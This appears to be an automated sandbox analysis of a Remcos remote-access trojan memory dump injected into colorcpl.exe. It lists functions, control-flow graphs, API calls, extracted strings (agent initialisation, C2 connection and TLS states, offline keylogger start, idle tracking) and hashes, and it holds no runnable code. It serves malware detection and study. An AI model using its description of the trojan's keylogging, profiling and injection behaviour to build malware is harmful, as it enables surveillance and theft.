                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0309D40C), ref: 030AA9B1
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9B4
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0309D40C), ref: 030AA9C5
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9C8
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0309D40C), ref: 030AA9D5
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9D8
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0309D40C), ref: 030AA9EA
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9ED
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0309D40C), ref: 030AA9FA
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9FD
                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0309D603
                                                                • Part of subcall function 0309F98D: __EH_prolog.LIBCMT ref: 0309F992
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                                              • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$exepath$licence$license_code.txt$origmsc
                                                              • API String ID: 1529173511-3534803471
                                                              • Opcode ID: 14b564ff7802cb71a5247a92fdf9e9ab3caa68eb149388c678dee0b186a63afd
                                                              • Instruction ID: 4f5fe13ae9a1249a1bcbb6e76f7a4f736189618b494651a249a41d8c0b88c54e
                                                              • Opcode Fuzzy Hash: 14b564ff7802cb71a5247a92fdf9e9ab3caa68eb149388c678dee0b186a63afd
                                                              • Instruction Fuzzy Hash: 0122F478B4734A2FFE19F7B49C25BBE26998FC5600F04086FA5429F2D2DF688D05A351
                                                              Function 030A3980 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 785sleepnetworkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 420 30a3980-30a39c8 call 30920bf call 30a9894 call 30920bf call 3091e45 call 3091f8b call 30c9867 433 30a39ca-30a39d1 Sleep 420->433 434 30a39d7-30a3a23 call 3092073 call 3091e45 call 30920d6 call 30a9d87 call 309487e call 3091e45 call 309fbab 420->434 433->434 449 30a3a97-30a3b32 call 3092073 call 3091e45 call 30920d6 call 30a9d87 call 3091e45 * 2 call 309822a call 3092ef0 call 3091fc2 call 3091fb8 * 2 call 3091e45 call 3095ae5 434->449 450 30a3a25-30a3a94 call 3091e45 call 309245c call 3091e45 call 3091f8b call 3091e45 call 309245c call 3091e45 call 3091f8b call 3091e45 call 309245c call 3091e45 call 3091f8b call 309471d 434->450 503 30a3b42-30a3b49 449->503 504 30a3b34-30a3b40 449->504 450->449 505 30a3b4e-30a3be0 call 3095a86 call 30952fe call 3098209 call 3092ef0 call 3092073 call 30a94da call 3091fb8 * 2 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 30a393f 503->505 504->505 532 30a3c2b-30a3c39 call 309480d 505->532 533 30a3be2-30a3c26 WSAGetLastError call 30aa86b call 30952dd call 3092073 call 30a94da call 3091fb8 505->533 538 30a3c3b-30a3c61 call 3092073 * 2 call 30a94da 532->538 539 30a3c66-30a3c7b call 3094f31 call 30948a8 532->539 554 30a4493-30a44a5 call 3094e06 call 30921da 533->554 538->554 539->554 555 30a3c81-30a3dd4 call 3091e45 * 2 call 30952fe call 3098209 call 3092ef0 call 3098209 call 3092ef0 call 3092073 call 30a94da call 3091fb8 * 4 call 30a97c1 call 30a3013 call 3098098 call 30cf34f call 3091e45 call 30920d6 call 309245c call 3091f8b * 2 call 30a20e8 539->555 569 30a44cd-30a44d5 call 3091e6d 554->569 570 30a44a7-30a44c7 call 3091e45 call 3091f8b call 30c9867 Sleep 554->570 620 30a3de8-30a3e0f call 3091f8b call 30a1f91 555->620 621 30a3dd6-30a3de3 call 3095a86 555->621 569->449 570->569 627 30a3e11-30a3e13 620->627 628 30a3e16-30a43fa call 309415e call 30a9c8a call 30a9b16 call 3091e45 GetTickCount call 30a9b16 call 30a9ac6 call 30a9b16 call 30a9a77 call 30a9c8a * 5 call 309e2bb call 30a9c8a call 3092f11 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 * 3 call 3092e81 call 3092ef0 call 3098209 call 3092ef0 call 3098209 call 3092ef0 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 call 309826c call 3092ef0 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 call 3098209 call 3092ef0 * 5 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 * 6 call 3094a81 call 3091fb8 * 48 call 3091ee9 call 3091fb8 * 4 call 3091ee9 call 3094bf0 620->628 621->620 627->628 855 30a43ff-30a4406 628->855 856 30a441a-30a4421 855->856 857 30a4408-30a440f 855->857 859 30a442d-30a445f call 3095a4b call 3092073 * 2 call 30a94da 856->859 860 30a4423-30a4428 call 3099f9a 856->860 857->856 858 30a4411-30a4413 857->858 858->856 871 30a4473-30a448e call 3091fb8 * 2 call 3091ee9 859->871 872 30a4461-30a446d CreateThread 859->872 860->859 871->554 872->871
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,00000029,771B0F10,03101FFC,00000000), ref: 030A39D1
                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 030A3BE2
                                                              • Sleep.KERNEL32(00000000,00000002), ref: 030A44C7
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$ErrorLastLocalTime
                                                              • String ID: | $%I64u$3.8.0 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                              • API String ID: 524882891-3810641973
                                                              • Opcode ID: 6618f5efe88a992265a8fd181ff2b95a5949099d7cf0ae9ae8d37277f76a2f87
                                                              • Instruction ID: 0be0ac8d0d7b3b3403dc7d18b9da10d9acb617a8270a8113dcebbc31e801dc4b
                                                              • Opcode Fuzzy Hash: 6618f5efe88a992265a8fd181ff2b95a5949099d7cf0ae9ae8d37277f76a2f87
                                                              • Instruction Fuzzy Hash: 3142AF39B462195FEF18F7A4ECA1AEEB3699FD4200F1045AAD00A6F1D1EF305F46DA50
                                                              Function 03099C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __Init_thread_footer.LIBCMT ref: 03099C81
                                                              • Sleep.KERNEL32(000001F4), ref: 03099C8C
                                                              • GetForegroundWindow.USER32 ref: 03099C92
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 03099C9B
                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 03099CCF
                                                              • Sleep.KERNEL32(000003E8), ref: 03099D9D
                                                                • Part of subcall function 0309962E: SetEvent.KERNEL32(?,?,?,0309A77B,?,?,?,?,?,00000000), ref: 0309965A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                              • API String ID: 911427763-3954389425
                                                              • Opcode ID: b74aa470fdac89ef759234107034f577691677e42b559bf269c1324599ae7310
                                                              • Instruction ID: 677f9a5fdc0c0ef02467eff8fa2babcb716ded19f35d83000193b7e55d71a510
                                                              • Opcode Fuzzy Hash: b74aa470fdac89ef759234107034f577691677e42b559bf269c1324599ae7310
                                                              • Instruction Fuzzy Hash: 8951017930A3449FEB08FB74D894AAEB7E9ABD4204F04095FF0868E1D0EF749945D792
                                                              Function 0309C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0309C753
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                              • API String ID: 82841172-425784914
                                                              • Opcode ID: fcd7368b2715fd605e6f6da12417ca100786f20fc913b264ad0aa8c28be56afb
                                                              • Instruction ID: 6b91b4e5c33f2c7ce38fceb67fafed536155c62ca1b5b464be6c800bb93bc3a8
                                                              • Opcode Fuzzy Hash: fcd7368b2715fd605e6f6da12417ca100786f20fc913b264ad0aa8c28be56afb
                                                              • Instruction Fuzzy Hash: 9541B67960A3019FFA08F765DC51DFFF3E8AEE0610F00092FF1525A0A1EF60990AE652
                                                              Function 030A44DA Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 510COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1041 30a44da-30a455d call 30920d6 SetEvent call 3091f8b call 3094182 call 30920d6 * 2 call 30a9d87 1054 30a4563 1041->1054 1055 30a5281-30a528a 1041->1055 1058 30a5188-30a5248 call 30a57e1 call 3091e45 call 3091f8b call 30c9867 call 30a5ceb call 3098b5f call 3091e45 call 30920d6 call 3091e45 call 30920d6 call 3091e45 call 3091f8b call 309415e call 3091e45 call 3091f8b call 309415e call 309838e 1054->1058 1059 30a4569-30a456d 1054->1059 1056 30a5290-30a5297 1055->1056 1057 30a5654-30a567d call 3091e6d call 3091fb8 * 2 1055->1057 1056->1057 1060 30a53ca 1056->1060 1061 30a548f-30a54ae call 3091e45 call 3095ae5 1056->1061 1062 30a558f-30a5594 call 30a8ccd 1056->1062 1063 30a55ad-30a55eb call 30966a6 call 3091e45 call 30a9b16 call 3092ef0 * 2 1056->1063 1064 30a55a3-30a55a8 call 30a8e2b 1056->1064 1065 30a52c1-30a52e1 call 3091e45 call 3091f8b call 30c9867 call 3098a88 1056->1065 1066 30a52e6-30a535a call 3091e45 call 3091f8b StrToIntA call 3091e45 call 3091f8b call 309c5ed call 3091ee4 call 3091e45 call 30aa27c call 3091ee4 call 30aa76c call 3091ee9 1056->1066 1067 30a54e6-30a5501 call 3091e45 call 30920d6 call 30a59ba 1056->1067 1068 30a5506-30a550b call 30a8e33 1056->1068 1069 30a53da-30a5407 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 30c9867 SetWindowTextW 1056->1069 1070 30a5599-30a559e call 30a8dec 1056->1070 1071 30a529e-30a52b4 call 3091e45 call 30920d6 1056->1071 1072 30a535f-30a53c5 call 3097ba0 call 3091e45 call 30920d6 call 3091e45 call 30920d6 call 3091e45 call 30920d6 call 309631d call 3097bae 1056->1072 1073 30a555d-30a558a call 3091e45 call 30951c3 call 3091e45 call 30a8dcb 1056->1073 1074 30a5412-30a542d call 3091e45 call 30920d6 call 30a7a63 1056->1074 1075 30a5432-30a544d call 3091e45 call 30920d6 call 3093f08 1056->1075 1076 30a5452-30a548a call 3091e45 call 3091f8b call 3092073 call 3091f8b call 30a215f 1056->1076 1077 30a5510-30a5517 1056->1077 1078 30a53d1-30a53d4 1056->1078 1079 30a55f5-30a5642 call 3095b0b call 3091e45 * 2 call 3092f11 call 3092ef0 call 3095e74 call 3091fb8 1056->1079 1317 30a524a-30a526b call 3098b73 call 3098aee call 3098b0f 1058->1317 1318 30a5270-30a527c call 3098ae3 1058->1318 1059->1057 1082 30a4573-30a4575 1059->1082 1060->1078 1173 30a54b0-30a54c5 call 3091e45 call 30920d6 1061->1173 1174 30a54c7-30a54d7 call 3091e45 call 30920d6 1061->1174 1062->1057 1063->1079 1064->1057 1065->1057 1066->1057 1068->1057 1069->1074 1070->1057 1175 30a52b9-30a52bc 1071->1175 1176 30a52b4 call 3096bda 1071->1176 1072->1057 1073->1057 1074->1175 1075->1175 1076->1057 1094 30a5519-30a5539 call 30aaa4f CreateThread 1077->1094 1095 30a553e-30a5558 ShowWindow SetForegroundWindow 1077->1095 1078->1069 1261 30a564b-30a564f 1079->1261 1262 30a5646 call 3091fb8 1079->1262 1104 30a4728-30a472f 1082->1104 1105 30a457c-30a45ad GetTickCount call 30a9b16 call 30a9ac6 call 30a9b16 call 30a9a77 1082->1105 1094->1057 1095->1057 1111 30a46f5-30a46fa call 30950c4 1104->1111 1222 30a45b2-30a46ac call 30a9c8a call 3091e45 call 3092f11 call 3092e81 call 3092ef0 call 3092e81 call 3092ef0 call 3092e81 call 3094a81 call 3091fb8 * 6 call 3091ee9 call 3091fb8 * 2 call 3091e45 call 3091f8b call 30c9867 1105->1222 1111->1057 1236 30a54dc-30a54e1 call 30a57f2 1173->1236 1174->1236 1175->1057 1176->1175 1343 30a46ae-30a46ba call 30946d3 1222->1343 1344 30a46d4-30a46ec call 3091e45 call 3095ae5 1222->1344 1236->1057 1261->1057 1273 30a564f call 3091fb8 1261->1273 1262->1261 1273->1057 1317->1318 1318->1057 1349 30a46bc-30a46c2 call 3094fd4 1343->1349 1350 30a46c7-30a46cf call 3094f31 1343->1350 1344->1057 1355 30a46f2-30a46f3 1344->1355 1349->1057 1350->1057 1355->1111
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CountEventTick
                                                              • String ID: hlight
                                                              • API String ID: 180926312-4166879102
                                                              • Opcode ID: 96b7afdfde288059f2e07b183141f8c305d5d32ae0aac0850b4f6a50efd862b8
                                                              • Instruction ID: db143b7b5827595d2e49683167a2df5775a2f6239a23029e2e507802b19fa37b
                                                              • Opcode Fuzzy Hash: 96b7afdfde288059f2e07b183141f8c305d5d32ae0aac0850b4f6a50efd862b8
                                                              • Instruction Fuzzy Hash: 9FF1A3397463055BEE18FBB4EC65BEE73A9AFD1200F40092EA1865F1D1EF349908D752
                                                              Function 030948A8 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 144COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1358 30948a8-30948c8 1360 30949fb-30949ff 1358->1360 1361 30948ce-30948d1 1358->1361 1364 3094a01-3094a0f 1360->1364 1365 3094a77 1360->1365 1362 30949f7-30949f9 1361->1362 1363 30948d7-30948da 1361->1363 1368 3094a79-3094a7e 1362->1368 1366 30948dc-3094903 call 30952fe call 3092073 call 30a94da 1363->1366 1367 3094906-3094910 call 30aea15 1363->1367 1364->1365 1373 3094a11-3094a14 1364->1373 1365->1368 1366->1367 1378 3094921-309492e call 30aec44 1367->1378 1379 3094912-309491c 1367->1379 1376 3094a51-3094a56 1373->1376 1377 3094a16-3094a4f call 30aa86b call 30952dd call 3092073 call 30a94da call 3091fb8 1373->1377 1381 3094a5b-3094a74 call 3092073 * 2 call 30a94da 1376->1381 1377->1365 1388 3094930-3094953 call 3092073 * 2 call 30a94da 1378->1388 1389 3094967-3094972 call 30af7f5 1378->1389 1379->1381 1381->1365 1422 3094956-3094962 call 30aea55 1388->1422 1404 30949a4-30949b1 call 30aebbb 1389->1404 1405 3094974-30949a2 call 3092073 * 2 call 30a94da call 30aee67 1389->1405 1418 30949d9-30949f4 CreateEventW 1404->1418 1419 30949b3-30949d6 call 3092073 * 2 call 30a94da 1404->1419 1405->1422 1418->1362 1419->1418 1422->1365
                                                              APIs
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,030A5824,?,00000001,00000000,00000000), ref: 030949E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateEventLocalTime
                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                              • API String ID: 2082726707-2151626615
                                                              • Opcode ID: 98b22fac8178d5d9c6cdcf450a11e25abd94de3953f3348f7e560109fc1c3074
                                                              • Instruction ID: 2a31c63866fb60a0b1e37bbb8dad77ce42a581b352ef746504087f1005452b39
                                                              • Opcode Fuzzy Hash: 98b22fac8178d5d9c6cdcf450a11e25abd94de3953f3348f7e560109fc1c3074
                                                              • Instruction Fuzzy Hash: EC41052DB537057FFE04F7BE9C168ADBA5EABC1100B40091AD8114FE42EB11A925D7D3
                                                              Function 030A92AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1471 30a92ae-30a9305 call 30a9f23 call 30a1f91 call 3091fc2 call 3091fb8 call 30960ea 1482 30a9348-30a9351 1471->1482 1483 30a9307-30a9316 call 30a1f91 1471->1483 1485 30a935a 1482->1485 1486 30a9353-30a9358 1482->1486 1488 30a931b-30a9332 call 3091f8b StrToIntA 1483->1488 1487 30a935f-30a936a call 309535d 1485->1487 1486->1487 1493 30a9340-30a9343 call 3091fb8 1488->1493 1494 30a9334-30a933d call 30aaccf 1488->1494 1493->1482 1494->1493
                                                              APIs
                                                                • Part of subcall function 030A9F23: GetCurrentProcess.KERNEL32(?,?,?,0309C663,WinDir,00000000,00000000), ref: 030A9F34
                                                                • Part of subcall function 030A1F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,00000000,00000000,00000000), ref: 030A1FB5
                                                                • Part of subcall function 030A1F91: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 030A1FD2
                                                                • Part of subcall function 030A1F91: RegCloseKey.KERNEL32(00000000), ref: 030A1FDD
                                                              • StrToIntA.SHLWAPI(00000000,030F9710,00000000,00000000,00000000,03101FFC,00000001,?,?,?,?,?,?,0309D6A0), ref: 030A9327
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 1866151309-2070987746
                                                              • Opcode ID: 63fb43d695818731d65e812b02d3ac763ecf6d68d6fae333ca21c9017400b777
                                                              • Instruction ID: ec0f034a220e07b8ad4f92389888040a959ca52e3a3f392557a612ec852db02a
                                                              • Opcode Fuzzy Hash: 63fb43d695818731d65e812b02d3ac763ecf6d68d6fae333ca21c9017400b777
                                                              • Instruction Fuzzy Hash: D8115C75B433492EDB04F7A8EC55BFFB75997C4110F440525E5055F1C2FB640842C3A1
                                                              Function 0309971E Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • Sleep.KERNEL32(00001388), ref: 03099738
                                                                • Part of subcall function 0309966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,03099745), ref: 030996A3
                                                                • Part of subcall function 0309966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,03099745), ref: 030996B2
                                                                • Part of subcall function 0309966D: Sleep.KERNEL32(00002710,?,?,?,03099745), ref: 030996DF
                                                                • Part of subcall function 0309966D: CloseHandle.KERNEL32(00000000,?,?,?,03099745), ref: 030996E6
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03099774
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 03099785
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0309979C
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 03099816
                                                                • Part of subcall function 030AA20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,030A5A44), ref: 030AA228
                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,030F9654,?,00000000,00000000,00000000,00000000,00000000), ref: 0309991F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                              • String ID:
                                                              • API String ID: 3795512280-0
                                                              • Opcode ID: 99c599a373b131ca9c91ff1d14a5d2800373b2761eecdbf61c5703e2965442e7
                                                              • Instruction ID: 63266603f5a3c90388111af94dc8cb242f0ac0e2f0ff8c145364050d64070c3b
                                                              • Opcode Fuzzy Hash: 99c599a373b131ca9c91ff1d14a5d2800373b2761eecdbf61c5703e2965442e7
                                                              • Instruction Fuzzy Hash: B1517B393063095BEF19FBB0D864AFF739AAFC4200F04092FA5479E2D1DF259909A652
                                                              Function 030AA17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1648 30aa17b-30aa18c 1649 30aa18e-30aa191 1648->1649 1650 30aa1a4-30aa1ab 1648->1650 1651 30aa19a-30aa1a2 1649->1651 1652 30aa193-30aa198 1649->1652 1653 30aa1ac-30aa1c5 CreateFileW 1650->1653 1651->1653 1652->1653 1654 30aa1cb-30aa1d0 1653->1654 1655 30aa1c7-30aa1c9 1653->1655 1657 30aa1eb-30aa1fc WriteFile 1654->1657 1658 30aa1d2-30aa1e0 SetFilePointer 1654->1658 1656 30aa209-30aa20e 1655->1656 1660 30aa1fe 1657->1660 1661 30aa200-30aa207 CloseHandle 1657->1661 1658->1657 1659 30aa1e2-30aa1e9 CloseHandle 1658->1659 1659->1655 1660->1661 1661->1656
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000), ref: 030AA1BA
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA1D7
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA1E3
                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA1F4
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,030AA29A,00000000,00000000,00000000,00000000,030A533F,00000002,00000001), ref: 030AA201
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreatePointerWrite
                                                              • String ID:
                                                              • API String ID: 1852769593-0
                                                              • Opcode ID: 375f6a0bc922f37342eb36d5f126688a623015b170b45fe364aa257129f1da33
                                                              • Instruction ID: 6f296831fa6b6e580b01b3436a711931cbb0e554f13c4608a2c30e67b45efa45
                                                              • Opcode Fuzzy Hash: 375f6a0bc922f37342eb36d5f126688a623015b170b45fe364aa257129f1da33
                                                              • Instruction Fuzzy Hash: 3B11A171347A187FE6509AACBC88E7FB79CEB46674F040A29F562C61C0C66A8C05C631
                                                              Function 03099203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,03099305,?,00000000,00000000), ref: 0309928B
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 0309929B
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 030992A7
                                                                • Part of subcall function 0309A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0309A0BE
                                                                • Part of subcall function 0309A0B0: wsprintfW.USER32 ref: 0309A13F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTimewsprintf
                                                              • String ID: Offline Keylogger Started
                                                              • API String ID: 465354869-4114347211
                                                              • Opcode ID: d752dac0f600cec12fb8b929636d4217dcdd91a72d0cbd4f4baaa6f86e0d86a2
                                                              • Instruction ID: 27717d81ba70f6d28beac3dc86b123a228504bdf599397d0bd59018ab66e6f2d
                                                              • Opcode Fuzzy Hash: d752dac0f600cec12fb8b929636d4217dcdd91a72d0cbd4f4baaa6f86e0d86a2
                                                              • Instruction Fuzzy Hash: 1C11E3A920230C3EFA10FA69DC86CFF7A9CDAC1198B40055EF8450A182DA606E09D6F2
                                                              Function 030A215F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,030F30C0), ref: 030A216E
                                                              • RegSetValueExA.KERNEL32(030F30C0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A2196
                                                              • RegCloseKey.KERNEL32(030F30C0,?,?,030AA83B,WallpaperStyle,030F30C0), ref: 030A21A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Control Panel\Desktop
                                                              • API String ID: 1818849710-27424756
                                                              • Opcode ID: f381acc57b18326798f2834ebe4b01d6af47cbd4c864df868b39ddfebfc84843
                                                              • Instruction ID: ce4352e18b20d711ebc3dae828c8f55da89684883a0a870c88604412d10cb2bd
